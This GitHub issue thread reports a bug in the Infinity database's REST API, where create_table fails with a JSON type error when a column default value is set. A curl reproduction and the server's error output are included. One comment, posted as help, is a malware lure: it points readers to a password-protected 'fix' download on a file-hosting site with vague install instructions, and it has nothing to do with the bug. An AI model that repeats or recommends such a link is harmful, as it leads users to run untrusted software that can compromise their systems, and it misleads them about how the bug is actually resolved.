### ISSUE TITLE
[Bug]: Cannot set default values with RESTful API `create_table`

### ISSUE THREAD

**Issue by writinwaters** [infiniflow/infinity#1738]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Version or Commit ID

v0.3.0-dev6

### Actual behavior and How to reproduce it

`show_table_columns` returns default values of each column. But I cannot set default column value with `create_table`:

```
 curl --request POST      --url http://localhost:23820/databases/default_db/tables/table_with_default      --header 'accept: application/json'      --header 'content-type: application/json'      --data ' {
       "create_option": "ignore_if_exists",
       "fields": [
           {
               "name": "name",
               "type": "varchar"
           },
           {
               "name": "score",
               "type": "float",
               "default": 5.0
           }
        ]
     } '
```
```
server=oatpp/1.3.0
code=500
description=Internal Server Error
message=[json.exception.type_error.305] cannot use operator[] with a string argument with number/string
```

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yangzq50** [comment]
Is this bug fixed now?
